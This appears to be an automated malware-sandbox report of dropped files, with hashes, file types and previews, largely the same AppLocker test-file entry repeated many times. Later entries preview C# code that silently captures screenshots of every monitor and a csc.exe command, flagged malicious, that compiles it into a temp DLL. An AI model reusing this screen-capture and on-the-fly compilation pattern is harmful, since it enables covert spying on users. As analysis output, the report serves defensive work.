                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                                                              Entropy (8bit):3.113268653505346
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBYak7Ynqq6NPN5Dlq5J:+RI+ycuZhNMakS4PNnqX
                                                                                                                                                                                                                                                              MD5:074D4044A23A228716916C7D35B76AF4
                                                                                                                                                                                                                                                              SHA1:20291E2E4879DAFE4BAC4497DE9BC11278304064
                                                                                                                                                                                                                                                              SHA-256:765B8C9C24A5AD51E433BE9A850904E30560E684B2F6389D24EAB86CC7A19127
                                                                                                                                                                                                                                                              SHA-512:7545E8C7B34CAD77DDD20B2BDD447CDD104E170CB1937E31185FFE72A5D5235818003B43ADDD91BCC17EDE62CBC748AA52260B60A13A07BA58A2FABBD862ABAF
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.3.o.q.5.o.j.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.3.o.q.5.o.j.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1004
                                                                                                                                                                                                                                                              Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                                              MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                                              SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                                              SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                                              SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):607
                                                                                                                                                                                                                                                              Entropy (8bit):5.335711261223786
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5wkn2B:p37Lvkmb6KOkqe1xBkrk+ikOfMWZEifp
                                                                                                                                                                                                                                                              MD5:2B6371FE7EEEBCE825C5AC7A8FF21A68
                                                                                                                                                                                                                                                              SHA1:D9DBE7077FB6244CEE706D49CA348746C7F7B6AB
                                                                                                                                                                                                                                                              SHA-256:76886F799173706ECBE74A90513FA00BDCB380E7B107E3FBE45819CCA6AC0084
                                                                                                                                                                                                                                                              SHA-512:85A670935FD765E8D81170B3119E480AC4047E4596F1818EA5C88822CB333A797F4F7679B1697BA1791BC19AEA1E3754EAA3D767BF64D23148C5EF082F4A8A2B
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.0.cs"
                                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                                                                              Entropy (8bit):3.16199579923142
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:6R7oEAtf0KhzBU/Mf6mtJbN0TpW1ulMa3Aq:HNz0jmzObaK
                                                                                                                                                                                                                                                              MD5:28AD2832302A01553149577349AF84EF
                                                                                                                                                                                                                                                              SHA1:4F998ADC3F8632EF89F11EF7460058A97DFA94E5
                                                                                                                                                                                                                                                              SHA-256:C557B59AE316604650E4F60EDCB9EDCBB216186C80113C3D0C1F0215CA57B01C
                                                                                                                                                                                                                                                              SHA-512:AED37635574374FB61D90554BCD25418EB538516C3E43B7F3119C9F742F16865C9B67620FC4F969600F7112B0CA2D38474788FA6FB79CD48073852D27D7814C4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....azg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):1149
                                                                                                                                                                                                                                                              Entropy (8bit):5.498949646037168
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:KJftkId3ka6KOkqeFkOf9EifsKax5DqBVKVrdFAMBJTH:utkkka6NkqeFky9EusK2DcVKdBJj
                                                                                                                                                                                                                                                              MD5:E9692C7630882402BBE6B295D094835C
                                                                                                                                                                                                                                                              SHA1:B3B2189B192B94A4FBC54991C2D48A4176CCF31D
                                                                                                                                                                                                                                                              SHA-256:08008EDFC86019AF265F64632473169D6590C7C9C61BF469A9D8FC8F2A4E1DEC
                                                                                                                                                                                                                                                              SHA-512:7CF39F8096337AF0A7D4B0F1B051662E6F5B2150D1C9F70590CD4EC61AE07DA25C384979858A09FDAC0595E4B849F3FE4455A0847087CB226DAFD6692AADCB49
                                                                                                                                                                                                                                                              Malicious:false
